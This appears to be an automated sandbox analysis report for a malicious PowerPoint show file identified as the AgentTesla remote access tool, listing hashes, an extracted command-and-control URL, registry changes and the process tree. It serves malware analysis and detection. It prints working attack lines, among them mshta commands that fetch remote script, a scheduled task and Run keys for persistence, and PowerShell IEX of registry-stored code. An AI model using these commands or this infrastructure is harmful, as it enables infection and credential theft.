Analysis
-
max time kernel
133s -
max time network
148s -
platform
windows7_x64 -
resource
win7v20210410 -
submitted
22-04-2021 07:05
Static task
static1
Behavioral task
behavioral1
Sample
PO944888299393.pps
Resource
win7v20210410
Behavioral task
behavioral2
Sample
PO944888299393.pps
Resource
win10v20210410
General
-
Target
PO944888299393.pps
-
Size
77KB
-
MD5
858604f0166fa58fe09e96988a87477c
-
SHA1
bed0b866c6b8cc1048153b22e96a51f464d6582b
-
SHA256
18b7a818fd88133d309ce7191e9c3eb85a3b31d0bbaf2c08df0f1cbdc26a7513
-
SHA512
d05a52ed607c6b96875428b8f3aa379c5460db17e6480e5bb3bfbdf0ba72fd895acb523b846413e99ca1d056a371462df94ca1556cd98ac2e1f0be1144da596d
Malware Config
Extracted
agenttesla
http://103.133.105.179/909/inc/29e2365d4334a8.php
Signatures
-
AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
-
Process spawned unexpected child process 2 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
mshta.exepowershell.exedescription pid pid_target process target process Parent C:\Program Files (x86)\Microsoft Office\Office14\POWERPNT.EXE is not expected to spawn this process 552 1056 mshta.exe POWERPNT.EXE Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1688 1600 powershell.exe -
AgentTesla Payload 3 IoCs
Processes:
resource yara_rule behavioral1/memory/2248-82-0x0000000000400000-0x000000000043C000-memory.dmp family_agenttesla behavioral1/memory/2248-83-0x0000000000437D8E-mapping.dmp family_agenttesla behavioral1/memory/2248-84-0x0000000000400000-0x000000000043C000-memory.dmp family_agenttesla -
Blocklisted process makes network request 16 IoCs
Processes:
mshta.exepowershell.exeflow pid process 7 552 mshta.exe 9 552 mshta.exe 11 552 mshta.exe 13 552 mshta.exe 15 552 mshta.exe 16 552 mshta.exe 18 552 mshta.exe 20 552 mshta.exe 21 552 mshta.exe 23 552 mshta.exe 25 552 mshta.exe 27 552 mshta.exe 30 1688 powershell.exe 32 1688 powershell.exe 34 1688 powershell.exe 36 1688 powershell.exe -
Drops file in Drivers directory 1 IoCs
Processes:
aspnet_compiler.exedescription ioc process File opened for modification C:\Windows\system32\drivers\etc\hosts aspnet_compiler.exe -
Adds Run key to start application 2 TTPs 6 IoCs
Processes:
mshta.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Windows\CurrentVersion\Run\ = "\"mshta\"\"http://1230948%[email protected]/p/9.html\"" mshta.exe Set value (str) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Windows\CurrentVersion\Run\nunukhaoo = "\"mshta\"\"http://1230948%[email protected]/p/9.html\"" mshta.exe Set value (str) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Windows\CurrentVersion\Run\replcia = "mshta vbscript:Execute(\"CreateObject(\"\"Wscript.Shell\"\").Run \"\"powershell ((gp HKCU:\\Software).nasdnasndnad)|IEX\"\", 0 : window.close\")" mshta.exe Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Windows\CurrentVersion\Run mshta.exe Set value (str) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Windows\CurrentVersion\Run\DLESOLCRETSAM = "mshta vbscript:Execute(\"CreateObject(\"\"Wscript.Shell\"\").Run \"\"powershell ((gp HKCU:\\Software).MSOFFICELO)|IEX\"\", 0 : window.close\")" mshta.exe Set value (str) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Windows\CurrentVersion\Run\dkkkksakdosexography = "\"mshta\"\"http://1230948%[email protected]/p/9.html\"" mshta.exe -
Drops file in System32 directory 1 IoCs
Processes:
powershell.exedescription ioc process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
powershell.exedescription pid process target process PID 1688 set thread context of 2248 1688 powershell.exe aspnet_compiler.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Kills process with taskkill 2 IoCs
Processes:
taskkill.exetaskkill.exepid process 2052 taskkill.exe 2064 taskkill.exe -
Processes:
POWERPNT.EXEmshta.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105" POWERPNT.EXE Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel POWERPNT.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1" POWERPNT.EXE Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Toolbar POWERPNT.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes" POWERPNT.EXE Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt POWERPNT.EXE Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote POWERPNT.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55" POWERPNT.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000" POWERPNT.EXE Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Modifies registry class 64 IoCs
Processes:
POWERPNT.EXEdescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{92D41A52-F07E-4CA4-AF6F-BEF486AA4E6F}\TypeLib\Version = "2.a" POWERPNT.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{92D41A5C-F07E-4CA4-AF6F-BEF486AA4E6F} POWERPNT.EXE Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_CLASSES\Wow6432Node\Interface\{82B02372-B5BC-11CF-810F-00A0C9030074} POWERPNT.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_CLASSES\Interface\{47FF8FE5-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents6" POWERPNT.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934CB-5A91-11CF-8700-00AA0060263B}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" POWERPNT.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934F7-5A91-11CF-8700-00AA0060263B}\ProxyStubClsid32 POWERPNT.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934F9-5A91-11CF-8700-00AA0060263B}\ProxyStubClsid32 POWERPNT.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{9149347C-5A91-11CF-8700-00AA0060263B}\TypeLib POWERPNT.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{92D41A6B-F07E-4CA4-AF6F-BEF486AA4E6F} POWERPNT.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{92D41A7C-F07E-4CA4-AF6F-BEF486AA4E6F}\TypeLib\Version = "2.a" POWERPNT.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_CLASSES\Wow6432Node\Interface\{29B86A70-F52E-11CE-9BCE-00AA00608E01}\ = "IOptionFrame" POWERPNT.EXE Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_CLASSES\Wow6432Node\Interface\{8BD21D13-EC42-11CE-9E0D-00AA006002F3} POWERPNT.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_CLASSES\Wow6432Node\Interface\{7B020EC1-AF6C-11CE-9F46-00AA00574A4F}\ = "CommandButtonEvents" POWERPNT.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{9149347A-5A91-11CF-8700-00AA0060263B}\TypeLib POWERPNT.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934DA-5A91-11CF-8700-00AA0060263B}\TypeLib\ = "{91493440-5A91-11CF-8700-00AA0060263B}" POWERPNT.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_CLASSES\Interface\{82B02370-B5BC-11CF-810F-00A0C9030074}\ = "IReturnInteger" POWERPNT.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{FB621625-C9EA-40F1-AF06-659AB704040B}\2.0\FLAGS\ = "6" POWERPNT.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934E9-5A91-11CF-8700-00AA0060263B}\TypeLib POWERPNT.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{92D41A7C-F07E-4CA4-AF6F-BEF486AA4E6F}\TypeLib\ = "{91493440-5A91-11CF-8700-00AA0060263B}" POWERPNT.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{BA72E554-4FF5-48F4-8215-5505F990966F}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" POWERPNT.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_CLASSES\Wow6432Node\Interface\{5512D123-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLSelect" POWERPNT.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{9149349D-5A91-11CF-8700-00AA0060263B}\ = "_Presentation" POWERPNT.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{92D41A73-F07E-4CA4-AF6F-BEF486AA4E6F}\ProxyStubClsid32 POWERPNT.EXE Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_CLASSES\Wow6432Node\Interface\{04598FC7-866C-11CF-AB7C-00AA00C08FCF} POWERPNT.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{9149346F-5A91-11CF-8700-00AA0060263B}\TypeLib\Version = "2.a" POWERPNT.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{91493470-5A91-11CF-8700-00AA0060263B}\ProxyStubClsid32 POWERPNT.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{9149347B-5A91-11CF-8700-00AA0060263B} POWERPNT.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{91493494-5A91-11CF-8700-00AA0060263B}\TypeLib\Version = "2.a" POWERPNT.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{91493498-5A91-11CF-8700-00AA0060263B}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" POWERPNT.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{91493458-5A91-11CF-8700-00AA0060263B}\TypeLib POWERPNT.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{9149345D-5A91-11CF-8700-00AA0060263B}\ = "PrintOptions" POWERPNT.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{9149346C-5A91-11CF-8700-00AA0060263B}\ProxyStubClsid32 POWERPNT.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934CE-5A91-11CF-8700-00AA0060263B}\TypeLib\ = "{91493440-5A91-11CF-8700-00AA0060263B}" POWERPNT.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934F3-5A91-11CF-8700-00AA0060263B}\TypeLib POWERPNT.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{92D41A7B-F07E-4CA4-AF6F-BEF486AA4E6F}\ProxyStubClsid32 POWERPNT.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{BA72E559-4FF5-48F4-8215-5505F990966F}\ProxyStubClsid32 POWERPNT.EXE Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_CLASSES\Interface\{A38BFFC3-A5A0-11CE-8107-00AA00611080} POWERPNT.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{91493479-5A91-11CF-8700-00AA0060263B}\ProxyStubClsid32 POWERPNT.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934C7-5A91-11CF-8700-00AA0060263B}\TypeLib\Version = "2.a" POWERPNT.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{92D41A63-F07E-4CA4-AF6F-BEF486AA4E6F}\TypeLib\Version = "2.a" POWERPNT.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{92D41A5D-F07E-4CA4-AF6F-BEF486AA4E6F}\TypeLib POWERPNT.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{92D41A6E-F07E-4CA4-AF6F-BEF486AA4E6F}\TypeLib\ = "{91493440-5A91-11CF-8700-00AA0060263B}" POWERPNT.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{92D41A79-F07E-4CA4-AF6F-BEF486AA4E6F}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" POWERPNT.EXE Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_CLASSES\Interface\{04598FC9-866C-11CF-AB7C-00AA00C08FCF} POWERPNT.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{91493478-5A91-11CF-8700-00AA0060263B}\ProxyStubClsid32 POWERPNT.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{9149348F-5A91-11CF-8700-00AA0060263B}\TypeLib POWERPNT.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934C0-5A91-11CF-8700-00AA0060263B}\TypeLib POWERPNT.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_CLASSES\Interface\{CF3F94A0-F546-11CE-9BCE-00AA00608E01}\ = "OptionFrameEvents" POWERPNT.EXE Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_CLASSES\Interface\{5512D123-5CC6-11CF-8D67-00AA00BDCE1D} POWERPNT.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934F1-5A91-11CF-8700-00AA0060263B}\TypeLib POWERPNT.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934F5-5A91-11CF-8700-00AA0060263B}\TypeLib\Version = "2.a" POWERPNT.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934F7-5A91-11CF-8700-00AA0060263B}\TypeLib\Version = "2.a" POWERPNT.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{92D41A55-F07E-4CA4-AF6F-BEF486AA4E6F}\TypeLib\Version = "2.a" POWERPNT.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{92D41A6B-F07E-4CA4-AF6F-BEF486AA4E6F}\TypeLib\Version = "2.a" POWERPNT.EXE Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_CLASSES\Wow6432Node\Interface\{5512D117-5CC6-11CF-8D67-00AA00BDCE1D} POWERPNT.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{9149345B-5A91-11CF-8700-00AA0060263B}\ = "NamedSlideShows" POWERPNT.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{91493466-5A91-11CF-8700-00AA0060263B}\TypeLib\Version = "2.a" POWERPNT.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{91493475-5A91-11CF-8700-00AA0060263B}\ = "Shapes" POWERPNT.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{FB621625-C9EA-40F1-AF06-659AB704040B}\2.0\FLAGS POWERPNT.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{91493489-5A91-11CF-8700-00AA0060263B} POWERPNT.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934DC-5A91-11CF-8700-00AA0060263B}\ProxyStubClsid32 POWERPNT.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{92D41A62-F07E-4CA4-AF6F-BEF486AA4E6F}\ = "DataLabels" POWERPNT.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{91493486-5A91-11CF-8700-00AA0060263B}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" POWERPNT.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934C0-5A91-11CF-8700-00AA0060263B}\ProxyStubClsid32 POWERPNT.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
POWERPNT.EXEpid process 1056 POWERPNT.EXE -
Suspicious behavior: EnumeratesProcesses 4 IoCs
Processes:
powershell.exeaspnet_compiler.exepid process 1688 powershell.exe 1688 powershell.exe 2248 aspnet_compiler.exe 2248 aspnet_compiler.exe -
Suspicious use of AdjustPrivilegeToken 43 IoCs
Processes:
powershell.exetaskkill.exeaspnet_compiler.exedescription pid process Token: SeDebugPrivilege 1688 powershell.exe Token: SeDebugPrivilege 2052 taskkill.exe Token: SeIncreaseQuotaPrivilege 1688 powershell.exe Token: SeSecurityPrivilege 1688 powershell.exe Token: SeTakeOwnershipPrivilege 1688 powershell.exe Token: SeLoadDriverPrivilege 1688 powershell.exe Token: SeSystemProfilePrivilege 1688 powershell.exe Token: SeSystemtimePrivilege 1688 powershell.exe Token: SeProfSingleProcessPrivilege 1688 powershell.exe Token: SeIncBasePriorityPrivilege 1688 powershell.exe Token: SeCreatePagefilePrivilege 1688 powershell.exe Token: SeBackupPrivilege 1688 powershell.exe Token: SeRestorePrivilege 1688 powershell.exe Token: SeShutdownPrivilege 1688 powershell.exe Token: SeDebugPrivilege 1688 powershell.exe Token: SeSystemEnvironmentPrivilege 1688 powershell.exe Token: SeRemoteShutdownPrivilege 1688 powershell.exe Token: SeUndockPrivilege 1688 powershell.exe Token: SeManageVolumePrivilege 1688 powershell.exe Token: 33 1688 powershell.exe Token: 34 1688 powershell.exe Token: 35 1688 powershell.exe Token: SeIncreaseQuotaPrivilege 1688 powershell.exe Token: SeSecurityPrivilege 1688 powershell.exe Token: SeTakeOwnershipPrivilege 1688 powershell.exe Token: SeLoadDriverPrivilege 1688 powershell.exe Token: SeSystemProfilePrivilege 1688 powershell.exe Token: SeSystemtimePrivilege 1688 powershell.exe Token: SeProfSingleProcessPrivilege 1688 powershell.exe Token: SeIncBasePriorityPrivilege 1688 powershell.exe Token: SeCreatePagefilePrivilege 1688 powershell.exe Token: SeBackupPrivilege 1688 powershell.exe Token: SeRestorePrivilege 1688 powershell.exe Token: SeShutdownPrivilege 1688 powershell.exe Token: SeDebugPrivilege 1688 powershell.exe Token: SeSystemEnvironmentPrivilege 1688 powershell.exe Token: SeRemoteShutdownPrivilege 1688 powershell.exe Token: SeUndockPrivilege 1688 powershell.exe Token: SeManageVolumePrivilege 1688 powershell.exe Token: 33 1688 powershell.exe Token: 34 1688 powershell.exe Token: 35 1688 powershell.exe Token: SeDebugPrivilege 2248 aspnet_compiler.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
Processes:
POWERPNT.EXEaspnet_compiler.exepid process 1056 POWERPNT.EXE 2248 aspnet_compiler.exe -
Suspicious use of WriteProcessMemory 29 IoCs
Processes:
POWERPNT.EXEmshta.exepowershell.exedescription pid process target process PID 1056 wrote to memory of 1980 1056 POWERPNT.EXE splwow64.exe PID 1056 wrote to memory of 1980 1056 POWERPNT.EXE splwow64.exe PID 1056 wrote to memory of 1980 1056 POWERPNT.EXE splwow64.exe PID 1056 wrote to memory of 1980 1056 POWERPNT.EXE splwow64.exe PID 1056 wrote to memory of 552 1056 POWERPNT.EXE mshta.exe PID 1056 wrote to memory of 552 1056 POWERPNT.EXE mshta.exe PID 1056 wrote to memory of 552 1056 POWERPNT.EXE mshta.exe PID 1056 wrote to memory of 552 1056 POWERPNT.EXE mshta.exe PID 552 wrote to memory of 1748 552 mshta.exe schtasks.exe PID 552 wrote to memory of 1748 552 mshta.exe schtasks.exe PID 552 wrote to memory of 1748 552 mshta.exe schtasks.exe PID 552 wrote to memory of 1748 552 mshta.exe schtasks.exe PID 552 wrote to memory of 2052 552 mshta.exe taskkill.exe PID 552 wrote to memory of 2052 552 mshta.exe taskkill.exe PID 552 wrote to memory of 2052 552 mshta.exe taskkill.exe PID 552 wrote to memory of 2052 552 mshta.exe taskkill.exe PID 552 wrote to memory of 2064 552 mshta.exe taskkill.exe PID 552 wrote to memory of 2064 552 mshta.exe taskkill.exe PID 552 wrote to memory of 2064 552 mshta.exe taskkill.exe PID 552 wrote to memory of 2064 552 mshta.exe taskkill.exe PID 1688 wrote to memory of 2248 1688 powershell.exe aspnet_compiler.exe PID 1688 wrote to memory of 2248 1688 powershell.exe aspnet_compiler.exe PID 1688 wrote to memory of 2248 1688 powershell.exe aspnet_compiler.exe PID 1688 wrote to memory of 2248 1688 powershell.exe aspnet_compiler.exe PID 1688 wrote to memory of 2248 1688 powershell.exe aspnet_compiler.exe PID 1688 wrote to memory of 2248 1688 powershell.exe aspnet_compiler.exe PID 1688 wrote to memory of 2248 1688 powershell.exe aspnet_compiler.exe PID 1688 wrote to memory of 2248 1688 powershell.exe aspnet_compiler.exe PID 1688 wrote to memory of 2248 1688 powershell.exe aspnet_compiler.exe
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\POWERPNT.EXE"C:\Program Files (x86)\Microsoft Office\Office14\POWERPNT.EXE" /s "C:\Users\Admin\AppData\Local\Temp\PO944888299393.pps"1⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1056 -
C:\Windows\splwow64.exeC:\Windows\splwow64.exe 122882⤵PID:1980
-
-
C:\Windows\SysWOW64\mshta.exemshta http://www.j.mp/djaksldqowdihjdam2⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Adds Run key to start application
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:552 -
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 80 /tn ""WIND0WSUPLATE"" /F /tr ""\""mshta\""vbscript:Execute("\"CreateObject(""\""Wscript.Shell""\"").Run ""\""mshta http://1230948%[email protected]/p/9.html""\"", 0 : window.close"\")3⤵
- Creates scheduled task(s)
PID:1748
-
-
C:\Windows\SysWOW64\taskkill.exe"C:\Windows\System32\taskkill.exe" /f /im winword.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2052
-
-
C:\Windows\SysWOW64\taskkill.exe"C:\Windows\System32\taskkill.exe" /f /im Excel.exe3⤵
- Kills process with taskkill
PID:2064
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -noexit ((gp HKCU:\Software).MSOFFICELO)|IEX1⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1688 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe#cmd2⤵
- Drops file in Drivers directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:2248
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
MD5c4c8ed067d386af41d40ca592935b14a
SHA181ef9c24c2207f7136478a7875fcfb4e2a4879cf
SHA256e51dcdd13ee1575abde7ef28de4947495c07727bec61fa8f41c51597e0bfff5f
SHA512852051231a1c74e4a5d9552bbfd84054a915ec91ef5a98013c37d817e51f1436664d4a99ccdb3e0b22e45dab65c4667fc908804febb9a52b7ede5dd069206ca0